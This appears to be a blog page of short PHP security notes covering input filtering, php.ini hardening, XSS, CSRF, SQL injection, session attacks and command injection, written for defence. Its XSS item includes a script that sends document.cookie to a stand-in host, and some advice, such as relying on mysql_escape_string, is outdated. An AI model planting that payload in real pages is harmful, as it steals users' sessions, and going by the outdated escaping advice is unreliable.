Skip to content

Security

IT Notes → PHP @ December 22, 2020

  • Encrypt data, filter input and escape output. Example filter_var($field, FILTER_SANITIZE_EMAIL), filter_var($field, FILTER_VALIDATE_EMAIL) etc.
  • Turn off special php.ini setting called magic_quotes_gpc. mysql_escape_string( ) is required to make user input safe for database entry.
  • Put key files outside document root. So not accessible. Also provide appropriate file ppermissions and block relvant files and folders using .htaccess.
  • Set expose_php to OFF, use a different file extension and set display_errors to off. Set register_globals to OFF.
  • Spoof forms can be used to attack website through form submissions from different locations by copying the code replacing the form action with absolute URL and replicating. Form. submission cannot be prevented but by spam check, HTTP_REFERER checking and tight server validation we can secure our site.
  • Cross Site Scripting (XSS) is a method where a JavaScript is injected in a third-party site say through comment form and the execution of the script will send visiting user’s personal data like cookies.
  • <script>
    document.location = http://example.org/getcookies.php?cookies=+ document.cookie;
    </script>
  • This can be prevented by proper escaping of output. So, JavaScript won’t execute while reading say a blog comment.
  • Cross Site Request Forgeries utilizes the applications trust of user. Here a user when clicks on a third-party image is taken to a site from where an action is made. Here the link forces an action because the website has a vulnerability that when action is passed as a parameter some action occurs. Now they can even simulate POST request. Here the user must be logged in. To prevent this our authentic form should have some hidden random value from session and check whether the value posted is the same as in session for authenticity.
  • SQL Injection. Use prepares or driver specific escape_string.
  • Session fixation is an attack where attacker fixes a session and makes you access the application with that session id. Once you login or move to higher privilege the attacker may be able to ride on the same session. Since it is the session id that the server cares about. This can be prevented by regenerating session id using session_regenerate_id() on each higher privilege change.
  • Session hijacking is gaining the user’s session and utilizing it. It can be checked by seeing if there is a HTTP_USER_AGENT change. But this is not 100% safe.
  • Remote Code Injection is an attack that occurs when a require or include code portion is based on a tainted user input.
  • Command injection occurs when tainted user input is used for shell execution. PHP provides escapeshellcmd() and escapeshellarg() as a means to properly escape shell output.
  • In shared hosting open_basedir (Prevents opening files outside a path using include etc), disable_functions (disables certain functions for security), and disable_classes (disables certain classes for security).
0 0 votes
Article Rating
Subscribe
Notify of
guest
0 Comments
Inline Feedbacks
View all comments
0
Would love your thoughts, please comment.x
()
x